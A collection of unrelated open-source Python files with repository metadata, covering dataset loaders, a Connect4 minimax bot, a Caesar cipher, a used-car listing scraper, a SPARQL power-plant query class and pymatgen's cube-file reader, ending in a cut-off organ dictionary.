numSamples, numFeatures = numpy.shape(test_features)
biasFeatures = scipy.sparse.csr_matrix(numpy.ones((numSamples, 1),
dtype = numpy.longdouble), dtype = numpy.longdouble)
self.testFeatures = scipy.sparse.hstack([test_features, biasFeatures], dtype = numpy.longdouble)
self.testFeatures = self.testFeatures.tocsr()
self.testLabels = labelTransform.fit_transform(sanitized_test_labels)
if labelSubset is not None:
self.testLabels = self.testLabels[:, labelSubset]
self.trainLabels = labelTransform.transform(sanitized_train_labels)
if labelSubset is not None:
self.trainLabels = self.trainLabels[:, labelSubset]
if self.verbose:
print("DatasetReader: [Message] Loaded ", corpusName, " [p, q, n_train, n_test]: ",\
numpy.shape(self.trainFeatures)[1], numpy.shape(self.trainLabels)[1],\
numpy.shape(self.trainLabels)[0], numpy.shape(self.testFeatures)[0])
sys.stdout.flush()
class SupervisedDataset(DatasetReader):
def __init__(self, dataset, verbose):
DatasetReader.__init__(self, copy_dataset = dataset, verbose = verbose)
self.validateFeatures = None
self.validateLabels = None
def freeAuxiliaryMatrices(self):
DatasetReader.freeAuxiliaryMatrices(self)
if self.validateFeatures is not None:
del self.validateFeatures
del self.validateLabels
if self.verbose:
print("SupervisedDataset: [Message] Freed matrices")
sys.stdout.flush()
def createTrainValidateSplit(self, validateFrac):
self.trainFeatures, self.validateFeatures, self.trainLabels, self.validateLabels = \
sklearn.model_selection.train_test_split(self.trainFeatures, self.trainLabels,
test_size = validateFrac, dtype = numpy.longdouble)
if self.verbose:
print("SupervisedDataset: [Message] Created supervised split [n_train, n_validate]: ",\
numpy.shape(self.trainFeatures)[0], numpy.shape(self.validateFeatures)[0])
sys.stdout.flush()
class BanditDataset(DatasetReader):
def __init__(self, dataset, verbose):
DatasetReader.__init__(self, copy_dataset = dataset, verbose = verbose)
self.sampledLabels = None
self.sampledLogPropensity = None
self.sampledLoss = None
self.validateFeatures = None
self.validateLabels = None
self.trainSampledLabels = None
self.validateSampledLabels = None
self.trainSampledLogPropensity = None
self.validateSampledLogPropensity = None
self.trainSampledLoss = None
self.validateSampledLoss = None
def freeAuxiliaryMatrices(self):
DatasetReader.freeAuxiliaryMatrices(self)
if self.sampledLabels is not None:
del self.sampledLabels
del self.sampledLogPropensity
del self.sampledLoss
if self.validateFeatures is not None:
del self.validateFeatures
del self.validateLabels
del self.trainSampledLabels
del self.validateSampledLabels
del self.trainSampledLogPropensity
del self.validateSampledLogPropensity
del self.trainSampledLoss
del self.validateSampledLoss
if self.verbose:
print("BanditDataset: [Message] Freed matrices")
sys.stdout.flush()
def registerSampledData(self, sampledLabels, sampledLogPropensity, sampledLoss):
self.sampledLabels = sampledLabels
self.sampledLogPropensity = sampledLogPropensity
self.sampledLoss = sampledLoss
if self.verbose:
print("BanditDataset: [Message] Registered bandit samples [n_samples]: ", numpy.shape(sampledLogPropensity)[0])
sys.stdout.flush()
def createTrainValidateSplit(self, validateFrac):
self.trainFeatures, self.validateFeatures, self.trainLabels, self.validateLabels, \
self.trainSampledLabels, self.validateSampledLabels, self.trainSampledLogPropensity, self.validateSampledLogPropensity, \
self.trainSampledLoss, self.validateSampledLoss = sklearn.model_selection.train_test_split(self.trainFeatures,
self.trainLabels, self.sampledLabels, self.sampledLogPropensity,
self.sampledLoss, test_size = validateFrac)
if self.verbose:
print("BanditDataset: [Message] Created bandit split [n_train, n_validate]:",\
numpy.shape(self.trainFeatures)[0], numpy.shape(self.validateFeatures)[0])
sys.stdout.flush()
| 2.5
| 2
|
codigo_das_aulas/aula_17/exemplo_09.py
|
VeirichR/curso-python-selenium
| 234
|
12780107
|
<gh_stars>100-1000
from selene.support.shared import browser
from selene.support.conditions import be
from selene.support.conditions import have
browser.open('http://google.com')
browser.element(
'input[name="q"]'
).should(be.blank).type('Envydust').press_enter()
| 2.078125
| 2
|
test-unit/PythonToJavascript/converters_test/DecoratorConverter_test.py
|
stoogoff/python-to-javascript
| 1
|
12780108
|
from utils import parseSource, nodesToString, nodesToLines, dumpNodes, dumpTree
from converters import DecoratorConverter
def test_DecoratorGather_01():
src = """
@require_call_auth( "view" )
def bim():
pass
"""
matches = DecoratorConverter().gather( parseSource( src ) )
match = matches[ 0 ]
assert nodesToString( match.at_sym ) == '@'
assert nodesToString( match.decorated ) == 'require_call_auth( "view" )'
assert str( match.newl ) == '\n'
def test_DecoratorProcess_01():
src = """
@require_call_auth( "view" )
def bim():
pass
"""
nodes = parseSource( src )
cvtr = DecoratorConverter()
matches = cvtr.gather( nodes )
cvtr.processAll( matches )
assert nodesToLines( nodes )[ 0 ] == """/* @require_call_auth( "view" ) DECORATOR */"""
| 2.625
| 3
|
tests/test_pycuda.py
|
karthik20122001/docker-python
| 2,030
|
12780109
|
<gh_stars>1000+
"""Tests for general GPU support"""
import unittest
from common import gpu_test
class TestPycuda(unittest.TestCase):
@gpu_test
def test_pycuda(self):
import pycuda.driver
pycuda.driver.init()
gpu_name = pycuda.driver.Device(0).name()
self.assertNotEqual(0, len(gpu_name))
| 2.640625
| 3
|
ode_explorer/utils/data_utils.py
|
njunge94/ode-explorer
| 3
|
12780110
|
<reponame>njunge94/ode-explorer
import os
import jax.numpy as jnp
from typing import List, Dict, Text, Any
from ode_explorer.types import State
__all__ = ["initialize_dim_names", "convert_to_dict", "write_result_to_csv"]
def initialize_dim_names(variable_names: List[Text], state: State):
"""
Initialize the dimension names for saving data to disk using pandas.
The dimension names will be used as column headers in the resulting pd.DataFrame.
Useful if you plan to label and plot your data automatically.
Args:
variable_names: Names of the state variables in the ODE integration run.
state: Sample state from which to infer the dimension names.
Returns:
A list of dimension names.
"""
var_dims = []
for k, v in zip(variable_names, state):
dim = 1 if jnp.isscalar(v) else len(v)
var_dims.append((k, dim))
dim_names = []
for i, (name, dim) in enumerate(var_dims):
if dim == 1:
dim_names += [name]
else:
dim_names += ["{0}_{1}".format(name, i) for i in range(1, dim + 1)]
return dim_names
def convert_to_dict(state: State, model_metadata: Dict[Text, Any], dim_names: List[Text]):
"""
Convert a state in a run result object to a Dict for use in a pd.DataFrame constructor.
Args:
state: ODE state obtained in the numerical integration run.
model_metadata: Model metadata saved in the run.
dim_names: Names of dimensions in the ODE.
Returns:
A dict containing the dimension names as keys and the corresponding scalar data as values.
"""
output_dict = dict()
variable_names = model_metadata["variable_names"]
idx = 0
for i, name in enumerate(variable_names):
v = state[i]
if jnp.isscalar(v):
k = dim_names[idx]
output_dict.update({k: v})
idx += 1
else:
k = dim_names[idx:idx + len(v)]
output_dict.update(dict(zip(k, v)))
idx += len(v)
return output_dict
def write_result_to_csv(result: List[Any],
out_dir: Text,
outfile_name: Text,
**kwargs) -> None:
"""
Write a run result to disk as a csv file.
Args:
result: List of ODE states in the run result, in Dict format.
out_dir: Designated output directory.
outfile_name: Designated output file name.
**kwargs: Additional keyword arguments passed to pandas.DataFrame.to_csv.
"""
raise NotImplementedError
# if not os.path.exists(out_dir):
# os.mkdir(out_dir)
#
# file_ext = ".csv"
#
# # convert result_list to data frame, fast construction from list
# result_df = pd.DataFrame(data=result)
#
# out_file = os.path.join(out_dir, outfile_name)
#
# result_df.to_csv(out_file + file_ext, **kwargs)
| 3.03125
| 3
|
Connect4/minimax.py
|
iridia-ulb/AI-book
| 2
|
12780111
|
<reponame>iridia-ulb/AI-book
from bot import Bot
import copy
from common import MINIMAX, EMPTY, ROW_COUNT, COLUMN_COUNT, WINDOW_LENGTH
import random
import math
class MiniMax(Bot):
"""
This class is responsible for the Minimax algorithm.
At each depth, the algorithm will simulate up to 7 boards, each having a piece that has been dropped in a free column. So with depth 1, we will have 7 boards to analyse, with depth 2 : 49 ,...
Through a system of reward each board will be attributed a score. The Minimax will then either try to minimise or maximise the rewards depending on the depth (odd or even). Indeed, because we are using multiple
depth, the minimax algorithm will simulate in alternance the possible moves of the current player and the ones of the adversary (creating Min nodes and max nodes). The player that needs to decide where to
drop a piece on the current board is considered as the maximising player, hence trying to maximise the reward when a max nodes is encountered. The algorithm will also consider that the adversary plays as good as possible (with
the information available with the depth chosen) and hence try to minimise the reward when possible (minimizing player).
So after creating all the boards of the tree, at each depth, a board will be selected based on the reward and on the type of nodes (min or max node) starting from the bottom of the tree.
The final choice is made based on the 7 boards possible with the score updated through the reward procedure describe above.
Note that the larger the depth, the slower the execution.
In order to avoid unnecessary exploration of boards, an alpha beta pruning has been implemented.
"""
def __init__(self, game, depth, pruning=True):
super().__init__(game, bot_type=MINIMAX, depth=depth, pruning=pruning)
def drop_piece(self, board, row, col, piece):
"""
Drop a piece in the board at the specified position
:param board: board with all the pieces that have been placed
:param col: one of the row of the board
:param col: one of the column of the board
:param piece: 1 or -1 depending on whose turn it is
"""
board[col][row] = piece
def get_next_open_row(self, board, col):
"""
Return the first row which does not have a piece in the specified column (col)
:param board: board with all the pieces that have been placed
:param col: one of the column of the board
:return: row number
"""
for r in range(ROW_COUNT):
if board[col][r] == 0:
return r
def winning_move(self, board, piece):
"""
Check if the game has been won
:param board: board with all the pieces that have been placed
:param piece: 1 or -1 depending on whose turn it is
"""
# Check horizontal locations for win
for c in range(COLUMN_COUNT - 3):
for r in range(ROW_COUNT):
if (
board[c][r] == piece
and board[c + 1][r] == piece
and board[c + 2][r] == piece
and board[c + 3][r] == piece
):
return True
# Check vertical locations for win
for c in range(COLUMN_COUNT):
for r in range(ROW_COUNT - 3):
if (
board[c][r] == piece
and board[c][r + 1] == piece
and board[c][r + 2] == piece
and board[c][r + 3] == piece
):
return True
# Check positively sloped diaganols
for c in range(COLUMN_COUNT - 3):
for r in range(ROW_COUNT - 3):
if (
board[c][r] == piece
and board[c + 1][r + 1] == piece
and board[c + 2][r + 2] == piece
and board[c + 3][r + 3] == piece
):
return True
# Check negatively sloped diaganols
for c in range(COLUMN_COUNT - 3):
for r in range(3, ROW_COUNT):
if (
board[c][r] == piece
and board[c + 1][r - 1] == piece
and board[c + 2][r - 2] == piece
and board[c + 3][r - 3] == piece
):
return True
return False
def is_terminal_node(self, board):
"""
Determines wheter the game is finished or not
:param board: board with all the pieces that have been placed
:return: boolean that determines wheter the game is finish or not
"""
return (
self.winning_move(board, self._game._turn * -1)
or self.winning_move(board, self._game._turn)
or self.get_valid_locations(board) is None
)
def evaluate_window(self, window, piece):
"""
Evaluates the score of a portion of the board
:param window: portion of the board with all the pieces that have been placed
:param piece: 1 or -1 depending on whose turn it is
:return: score of the window
"""
score = 0
opp_piece = self._game._turn * -1
if piece == self._game._turn * -1:
opp_piece = self._game._turn
if window.count(piece) == 4:
score += 100
elif window.count(piece) == 3 and window.count(EMPTY) == 1:
score += 5
elif window.count(piece) == 2 and window.count(EMPTY) == 2:
score += 2
if window.count(opp_piece) == 3 and window.count(EMPTY) == 1:
score -= 4
return score
def score_position(self, board, piece):
"""
Main function that handles the scoring mechanism.
Handle the score for the minimax algorithm, the score is computed independently of which piece has just been dropped. This is a global score that looks at the whole board
:param board: board with all the pieces that have been placed
:param piece: 1 or -1 depending on whose turn it is
:return: score of the board
"""
score = 0
# Score center column
center_array = [int(i) for i in list(board[COLUMN_COUNT // 2][:])]
center_count = center_array.count(piece)
score += center_count * 3
# Score Horizontal
for r in range(ROW_COUNT):
row_array = [int(i) for i in list(board[:][r])]
for c in range(COLUMN_COUNT - 3):
window = row_array[c : c + WINDOW_LENGTH]
score += self.evaluate_window(window, piece)
# Score Vertical
for c in range(COLUMN_COUNT):
col_array = [int(i) for i in list(board[c][:])]
for r in range(ROW_COUNT - 3):
window = col_array[r : r + WINDOW_LENGTH]
score += self.evaluate_window(window, piece)
# Score posiive sloped diagonal
for r in range(ROW_COUNT - 3):
for c in range(COLUMN_COUNT - 3):
window = [board[c + i][r + i] for i in range(WINDOW_LENGTH)]
score += self.evaluate_window(window, piece)
for r in range(ROW_COUNT - 3):
for c in range(COLUMN_COUNT - 3):
window = [board[c + i][r + 3 - i] for i in range(WINDOW_LENGTH)]
score += self.evaluate_window(window, piece)
return score
def minimax(self, board, depth, alpha, beta, maximizingPlayer, pruning):
"""
Main function of minimax, called whenever a move is needed.
Recursive function, depth of the recursion being determined by the parameter depth.
:param depth: number of iterations the Minimax algorith will run for
(the larger the depth the longer the algorithm takes)
:alpha: used for the pruning, correspond to the lowest value of the range values of the node
:beta: used for the pruning, correspond to the hihest value of the range values of the node
:maximizingPlayer: boolean to specify if the algorithm should maximize or minimize the reward
:pruning: boolean to specify if the algorithm uses the pruning
:return: column where to place the piece
"""
valid_locations = self.get_valid_locations(board)
is_terminal = self.is_terminal_node(board)
if depth == 0:
return (None, self.score_position(board, self._game._turn))
elif is_terminal:
if self.winning_move(board, self._game._turn):
return (None, math.inf)
elif self.winning_move(board, self._game._turn * -1):
return (None, -math.inf)
else: # Game is over, no more valid moves
return (None, 0)
column = valid_locations[0]
if maximizingPlayer:
value = -math.inf
turn = 1
else:
value = math.inf
turn = -1
for col in valid_locations:
row = self.get_next_open_row(board, col)
b_copy = copy.deepcopy(board)
self.drop_piece(b_copy, row, col, self._game._turn * turn)
new_score = self.minimax(
b_copy, depth - 1, alpha, beta, not maximizingPlayer, pruning
)[1]
if maximizingPlayer:
if new_score > value:
value = new_score
column = col
alpha = max(alpha, value)
else:
if new_score < value:
value = new_score
column = col
beta = min(beta, value)
if pruning:
if alpha >= beta:
break
return column, value
| 3.859375
| 4
|
codCesarList.py
|
lorena112233/pythonDay1
| 0
|
12780112
|
<reponame>lorena112233/pythonDay1
listAbecedario = [ "a","b","c","d","e","f","g","h","i","j","k","l","m","n","ñ","o","p","q","r","s","t","u","v","w","x","y","z" ]
desplazamiento = 60
respuesta = str(input("Que quieres traducir?: "))
textoCifrado = ""
for letra in respuesta:
if letra in listAbecedario:
posicion = listAbecedario.index(letra)
nuevaPosicion = posicion + desplazamiento
#aqui defino lo que pasa cuando la posicion es mayor que la length del abecedario, que vuelva a empezar
while nuevaPosicion >= len(listAbecedario):
nuevaPosicion = abs(len(listAbecedario)-nuevaPosicion)
textoCifrado+=listAbecedario[nuevaPosicion]
else: #Si pongo una coma, o un espacio, no traduce, lo respeta, porque no esta en el abecedario
textoCifrado+=letra
print(textoCifrado)
#----------------------------------------------------------------------
| 3.671875
| 4
|
Core/Block_9/R9001_Factory.py
|
BernardoB95/Extrator_SPEDFiscal
| 1
|
12780113
|
<gh_stars>1-10
from Core.IFactory import IFactory
from Regs.Block_9 import R9001
class R9001Factory(IFactory):
def create_block_object(self, line):
self.r9001 = _r9001 = R9001()
_r9001.reg_list = line
return _r9001
| 1.945313
| 2
|
notebooks/parsebat.py
|
NickleDave/conbirt
| 0
|
12780114
|
<filename>notebooks/parsebat.py<gh_stars>0
import numpy as np
from scipy.io import loadmat
def parse_batlab_mat(mat_file):
"""parse batlab annotation.mat file"""
mat = loadmat(mat_file, squeeze_me=True)
annot_list = []
# annotation structure loads as a Python dictionary with two keys
# one maps to a list of filenames,
# and the other to a Numpy array where each element is the annotation
# coresponding to the filename at the same index in the list.
# We can iterate over both by using the zip() function.
for filename, annotation in zip(mat['filenames'], mat['annotations']):
# below, .tolist() does not actually create a list,
# instead gets ndarray out of a zero-length ndarray of dtype=object.
# This is just weirdness that results from loading complicated data
# structure in .mat file.
seg_start_times = annotation['segFileStartTimes'].tolist()
seg_end_times = annotation['segFileEndTimes'].tolist()
seg_types = annotation['segType'].tolist()
if type(seg_types) == int:
# this happens when there's only one syllable in the file
# with only one corresponding label
seg_types = np.asarray([seg_types]) # so make it a one-element list
elif type(seg_types) == np.ndarray:
# this should happen whenever there's more than one label
pass
else:
# something unexpected happened
raise ValueError("Unable to load labels from {}, because "
"the segType parsed as type {} which is "
"not recognized.".format(filename,
type(seg_types)))
samp_freq = annotation['fs'].tolist()
seg_start_times_Hz = np.round(seg_start_times * samp_freq).astype(int)
seg_end_times_Hz = np.round(seg_end_times * samp_freq).astype(int)
annot_dict = {
'audio_file': filename,
'seg_types': seg_types,
'seg_start_times': seg_start_times,
'seg_end_times': seg_end_times,
'seg_start_times_Hz': seg_start_times_Hz,
'seg_end_times_Hz': seg_end_times_Hz,
}
annot_list.append(annot_dict)
return annot_list
| 2.953125
| 3
|
web/JPS_EMISSIONS/python/latest/powerplant_sparql_sync.py
|
mdhillmancmcl/TheWorldAvatar-CMCL-Fork
| 21
|
12780115
|
<filename>web/JPS_EMISSIONS/python/latest/powerplant_sparql_sync.py
import rdflib
import re
from datetime import datetime
class PowerplantSPARQLSync:
def __init__(self, powerplant):
self.powerplantIRI = powerplant
self.graph = rdflib.Graph()
self.graph.parse(self.powerplantIRI)
# self.powerplantIRI = powerplant
# self.powerplantName = powerplant[powerplant.rfind('#') + 1:]
# self.graph = rdflib.Graph()
# self.graph.parse("C:/TOMCAT/webapps/ROOT/kb/powerplants/{}.owl".format(self.powerplantName))
self.generationTechnologyMap = {
'Cogeneration': 'cogeneration',
'CombinedCycleGasTurbine': 'CCGT',
'GasEngine': 'Engine',
'OpenCycleGasTurbine': 'OCGT',
'SubCriticalThermal': 'subcritical',
'SuperCriticalThermal': 'supercritical',
'UltraSuperCriticalThermal': 'ultrasupercritical'
}
self.primaryFuelToFuelUsedMap = {
'natural_gas': 'gas',
'oil': 'oil',
'coal': 'coal',
'bituminous': 'coal',
'subbituminous': 'coal',
'lignite': 'coal',
'anthracite': 'coal',
'coal_biomass': 'coal'
}
def __del__(self):
pass
def getPowerplantInfo(self):
queryString = """
PREFIX j1: <http://www.theworldavatar.com/ontology/ontocape/upper_level/system.owl#>
PREFIX j6: <http://www.theworldavatar.com/ontology/ontoeip/system_aspects/system_realization.owl#>
PREFIX j8: <http://www.theworldavatar.com/ontology/ontoeip/powerplants/PowerPlant.owl#>
PREFIX j5: <http://www.theworldavatar.com/ontology/ontocape/upper_level/technical_system.owl#>
PREFIX j7: <http://www.theworldavatar.com/ontology/ontoeip/system_aspects/system_performance.owl#>
SELECT ?country ?capacityValue ?year ?primaryFuel ?genTech ?annualGenValue ?genCostValue ?emissionRateValue
WHERE
{{
<{0}> j1:hasAddress ?country .
<{0}> j6:designCapacity ?capacityIRI.
?capacityIRI j1:hasValue ?capacity.
?capacity j1:numericalValue ?capacityValue.
<{0}> j8:hasYearOfBuilt ?yearOfBuilt.
?yearOfBuilt j1:hasValue ?yearValue.
?yearValue j1:numericalValue ?year.
<{0}> j5:realizes ?generation.
?generation j8:consumesPrimaryFuel ?primaryFuel.
?generation j8:usesGenerationTechnology ?genTech.
?generation j8:hasAnnualGeneration ?annualGenIRI.
?annualGenIRI j1:hasValue ?annualGenValIRI.
?annualGenValIRI j1:numericalValue ?annualGenValue.
?generation j7:hasCosts ?genCostIRI.
?genCostIRI j1:hasValue ?genCostValIRI.
?genCostValIRI j1:numericalValue ?genCostValue.
?generation j7:hasEmission ?emissionRateIRI.
?emissionRateIRI j1:hasValue ?emissionRateValIRI.
?emissionRateValIRI j1:numericalValue ?emissionRateValue
}}
""".format(self.powerplantIRI)
queryResults = self.graph.query(queryString).bindings
# get country
country = re.search(r'/([a-zA-Z_]+)$', str(queryResults[0]['country'])).group(1)
# get capacity value
capacityValue = int(queryResults[0]['capacityValue'].toPython())
# get year
year = int(queryResults[0]['year'].toPython())
# get primary fuel
primaryFuel = re.search(r'#([a-zA-Z]+)$', str(queryResults[0]['primaryFuel'])).group(1).lower()
if primaryFuel == "naturalgas":
primaryFuel = "natural_gas"
elif primaryFuel == "coalbiomass":
primaryFuel = "coal_biomass"
# get generation
genTechRegexResult = re.search(r'#([a-zA-Z]+)$', str(queryResults[0]['genTech'])).group(1)
genTech = self.generationTechnologyMap[genTechRegexResult]
# get output_MWh (a.k.a. annual generation in knowledge base)
annualGenValue = float(queryResults[0]['annualGenValue'].toPython())
# fuel_used
fuelUsed = self.primaryFuelToFuelUsedMap[primaryFuel]
dict = {}
dict['country'] = country
dict['capacity_MW'] = capacityValue
dict['primary_fuel'] = primaryFuel
dict['generation_technology'] = genTech
dict['age'] = datetime.now().year - year
dict['output_MWh'] = annualGenValue
dict['fuel_used'] = fuelUsed
return dict
| 2.453125
| 2
|
quotesbot/spiders/autotalli.py
|
Martynasvov/testinisprojektas2
| 0
|
12780116
|
# -*- coding: utf-8 -*-
import scrapy
class AutotalliSpider(scrapy.Spider):
name = "autotalli"
allowed_domains = ["autotalli.com"]
current_page = 1
start_url = 'https://www.autotalli.com/vaihtoautot/listaa/sivu/{}'
start_urls = [start_url.format(1)]
def parse(self, response):
skelbimu_linkai = response.css('a.carsListItemNameLink::attr(href)').extract()
for link in skelbimu_linkai:
yield scrapy.Request(url=response.urljoin(link), callback=self.parse_skelbimas)
if skelbimu_linkai:
self.current_page += 1
yield scrapy.Request(url=self.start_url.format(self.current_page), callback=self.parse)
def parse_skelbimas(self, response):
kaina = response.css("div.carPrice span::text").extract_first()
title = response.css('h1.carTitlee::text').extract_first()
kilometrazas = {}
for carDetailsLine in response.css('div.carDetailsGroup div.carDetailsLine'):
name = carDetailsLine.css('div.label::text').extract_first()
if name == 'Mittarilukema':
value = carDetailsLine.css('div.value::text').extract_first()
kilometrazas.update({name.strip(): value.strip()})
photo = response.css('div.image img::attr(src)').extract()
yield {
'kaina': kaina,
'skelbimo_pavadinimas': title,
'kilometrazas': kilometrazas,
'fotkes': photo
}
| 2.734375
| 3
|
tests/test_metrics.py
|
mlrun/metrics-gen
| 0
|
12780117
|
<gh_stars>0
from metrics_gen.deployment_generator import deployment_generator
from metrics_gen.metrics_generator import Generator_df
import pandas as pd
import yaml
def get_deployment(configuration: dict) -> pd.DataFrame:
dep_gen = deployment_generator()
deployment = dep_gen.generate_deployment(configuration=configuration)
return deployment
class TestMetrics:
configuration: dict = yaml.safe_load(
open(
"./tests/test_configuration.yaml",
"r",
)
)
metrics_configuration: dict = configuration.get("metrics", {})
deployment: pd.DataFrame = get_deployment(configuration)
def test_metric_as_dict(self):
met_gen = Generator_df(self.configuration, user_hierarchy=self.deployment)
generator = met_gen.generate(as_df=False)
assert (generator, "No generated data was created")
def test_metric_as_df(self):
met_gen = Generator_df(self.configuration, user_hierarchy=self.deployment)
generator = met_gen.generate(as_df=True)
assert (generator, "No generated data was created")
| 2.3125
| 2
|
mobilebdd/reports/jsonifier.py
|
PhoenixWright/MobileBDDCore
| 0
|
12780118
|
import json
from mobilebdd.reports.base import BaseReporter
class JsonReporter(BaseReporter):
"""
outputs the test run results in the form of a json
one example use case is to plug this into a bdd api that returns the results
in json format.
"""
def __init__(self, config):
super(JsonReporter, self).__init__(config)
def get_json(self):
"""
:return: json payload of the test results
:rtype: str
"""
return json.dumps({u'features': self.features})
| 2.71875
| 3
|
pymatgen/io/cube.py
|
Crivella/pymatgen
| 921
|
12780119
|
<gh_stars>100-1000
"""
Module for reading Gaussian cube files, which have become one of the standard file formats
for volumetric data in quantum chemistry and solid state physics software packages
(VASP being an exception).
Some basic info about cube files
(abridged info from http://paulbourke.net/dataformats/cube/ by <NAME>)
The file consists of a header which includes the atom information and the size as well
as orientation of the volumetric data. The first two lines of the header are comments. The
third line has the number of atoms included in the file followed by the position of the
origin of the volumetric data. The next three lines give the number of voxels along each axis
(x, y, z) followed by the axis vector. The last section in the header is one line for each
atom consisting of 5 numbers, the first is the atom number, the second is the charge, and
the last three are the x,y,z coordinates of the atom center. The volumetric data is straightforward,
one floating point number for each volumetric element.
Example
In the following example the volumetric data is a 40 by 40 by 40 grid, each voxel is 0.283459 units
wide and the volume is aligned with the coordinate axis. There are three atoms.
CPMD CUBE FILE.
OUTER LOOP: X, MIDDLE LOOP: Y, INNER LOOP: Z
3 0.000000 0.000000 0.000000
40 0.283459 0.000000 0.000000
40 0.000000 0.283459 0.000000
40 0.000000 0.000000 0.283459
8 0.000000 5.570575 5.669178 5.593517
1 0.000000 5.562867 5.669178 7.428055
1 0.000000 7.340606 5.669178 5.111259
-0.25568E-04 0.59213E-05 0.81068E-05 0.10868E-04 0.11313E-04 0.35999E-05
: : : : : :
: : : : : :
: : : : : :
In this case there will be 40 x 40 x 40 floating point values
: : : : : :
: : : : : :
: : : : : :
"""
import numpy as np
from monty.io import zopen
from pymatgen.core.sites import Site
from pymatgen.core.structure import Structure
from pymatgen.core.units import bohr_to_angstrom
# TODO: can multiprocessing be incorporated without causing issues during drone assimilation?
class Cube:
"""
Class to read Gaussian cube file formats for volumetric data.
Cube files are, by default, written in atomic units, and this
class assumes that convention.
"""
def __init__(self, fname):
"""
Initialize the cube object and store the data as self.data
Args:
fname (str): filename of the cube to read
"""
f = zopen(fname, "rt")
# skip header lines
for i in range(2):
f.readline()
# number of atoms followed by the position of the origin of the volumetric data
line = f.readline().split()
self.natoms = int(line[0])
self.origin = np.array(list(map(float, line[1:])))
# The number of voxels along each axis (x, y, z) followed by the axis vector.
line = f.readline().split()
self.NX = int(line[0])
self.X = np.array([bohr_to_angstrom * float(l) for l in line[1:]])
self.dX = np.linalg.norm(self.X)
line = f.readline().split()
self.NY = int(line[0])
self.Y = np.array([bohr_to_angstrom * float(l) for l in line[1:]])
self.dY = np.linalg.norm(self.Y)
line = f.readline().split()
self.NZ = int(line[0])
self.Z = np.array([bohr_to_angstrom * float(l) for l in line[1:]])
self.dZ = np.linalg.norm(self.Z)
self.voxel_volume = abs(np.dot(np.cross(self.X, self.Y), self.Z))
self.volume = abs(np.dot(np.cross(self.X.dot(self.NZ), self.Y.dot(self.NY)), self.Z.dot(self.NZ)))
# The last section in the header is one line for each atom consisting of 5 numbers,
# the first is the atom number, second is charge,
# the last three are the x,y,z coordinates of the atom center.
self.sites = []
for i in range(self.natoms):
line = f.readline().split()
self.sites.append(Site(line[0], np.multiply(bohr_to_angstrom, list(map(float, line[2:])))))
self.structure = Structure(
lattice=[self.X * self.NX, self.Y * self.NY, self.Z * self.NZ],
species=[s.specie for s in self.sites],
coords=[s.coords for s in self.sites],
coords_are_cartesian=True,
)
# Volumetric data
self.data = np.reshape(np.array(f.read().split()).astype(float), (self.NX, self.NY, self.NZ))
def mask_sphere(self, radius, cx, cy, cz):
"""
Create a mask for a sphere with radius=radius, centered at cx, cy, cz.
Args:
radius: (flaot) of the mask (in Angstroms)
cx, cy, cz: (float) the fractional coordinates of the center of the sphere
"""
dx, dy, dz = (
np.floor(radius / np.linalg.norm(self.X)).astype(int),
np.floor(radius / np.linalg.norm(self.Y)).astype(int),
np.floor(radius / np.linalg.norm(self.Z)).astype(int),
)
gcd = max(np.gcd(dx, dy), np.gcd(dy, dz), np.gcd(dx, dz))
sx, sy, sz = dx // gcd, dy // gcd, dz // gcd
r = min(dx, dy, dz)
x0, y0, z0 = int(np.round(self.NX * cx)), int(np.round(self.NY * cy)), int(np.round(self.NZ * cz))
centerx, centery, centerz = self.NX // 2, self.NY // 2, self.NZ // 2
a = np.roll(self.data, (centerx - x0, centery - y0, centerz - z0))
i, j, k = np.indices(a.shape, sparse=True)
a = np.sqrt((sx * i - sx * centerx) ** 2 + (sy * j - sy * centery) ** 2 + (sz * k - sz * centerz) ** 2)
indices = a > r
a[indices] = 0
return a
def get_atomic_site_averages(self, atomic_site_radii):
"""
Get the average value around each atomic site.
Args:
atomic_site_radii (dict): dictionary determining the cutoff radius (in Angstroms)
for averaging around atomic sites (e.g. {'Li': 0.97, 'B': 0.77, ...}. If
not provided, then the
returns:
Array of site averages, [Average around site 1, Average around site 2, ...]
"""
return [self._get_atomic_site_average(s, atomic_site_radii[s.species_string]) for s in self.structure.sites]
def _get_atomic_site_average(self, site, radius):
"""
Helper function for get_atomic_site_averages.
Args:
site: Site in the structure around which to get the average
radius: (float) the atomic_site_radius (in Angstroms) for given atomic species
returns:
Average around the atomic site
"""
mask = self.mask_sphere(radius, *site.frac_coords)
return np.sum(self.data * mask) / np.count_nonzero(mask)
def get_atomic_site_totals(self, atomic_site_radii):
"""
Get the integrated total in a sphere around each atomic site.
Args:
atomic_site_radii (dict): dictionary determining the cutoff radius (in Angstroms)
for averaging around atomic sites (e.g. {'Li': 0.97, 'B': 0.77, ...}. If
not provided, then the
returns:
Array of site averages, [Average around site 1, Average around site 2, ...]
"""
return [self._get_atomic_site_total(s, atomic_site_radii[s.species_string]) for s in self.structure.sites]
def _get_atomic_site_total(self, site, radius):
"""
Helper function for get_atomic_site_averages.
Args:
site: Site in the structure around which to get the total
radius: (float) the atomic_site_radius (in Angstroms) for given atomic species
returns:
Average around the atomic site
"""
mask = self.mask_sphere(radius, *site.frac_coords)
return np.sum(self.data * mask)
def get_axis_grid(self, ind):
"""
Modified from pymatgen.io.vasp.outputs
Returns the grid for a particular axis.
Args:
ind (int): Axis index.
"""
ng = self.data.shape
num_pts = ng[ind]
lengths = self.structure.lattice.abc
return [i / num_pts * lengths[ind] for i in range(num_pts)]
def get_average_along_axis(self, ind):
"""
Modified from pymatgen.io.vasp.outputs
Get the averaged total of the volumetric data a certain axis direction.
For example, useful for visualizing Hartree Potentials.
Args:
ind (int): Index of axis.
Returns:
Average total along axis
"""
ng = self.data.shape
m = self.data
if ind == 0:
total = np.sum(np.sum(m, axis=1), 1)
elif ind == 1:
total = np.sum(np.sum(m, axis=0), 1)
else:
total = np.sum(np.sum(m, axis=0), 0)
return total / ng[(ind + 1) % 3] / ng[(ind + 2) % 3]
| 2.59375
| 3
|
faker_biology/physiology/organs_data.py
|
richarda23/faker-biology
| 7
|
12780120
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 13 10:20:19 2022
@author: richard
"""
organ_data = {
"Musculoskeletal system": {
"Human skeleton": {},
"Joints": {},
"Ligaments": {},
"Muscular system": {},
"Tendons": {},
},
"Digestive system": {
"Mouth": {"Teeth": {}, "Tongue": {}},
"Salivary glands": {
"Parotid glands": {},
"Submandibular glands": {},
"Sublingual glands": {},
},
"Pharynx": {},
"Esophagus": {},
"Stomach": {},
"Small intestine": {"Duodenum": {}, "Jejunum": {}, "Ileum": {}},
"Large intestine": {
"Cecum": {},
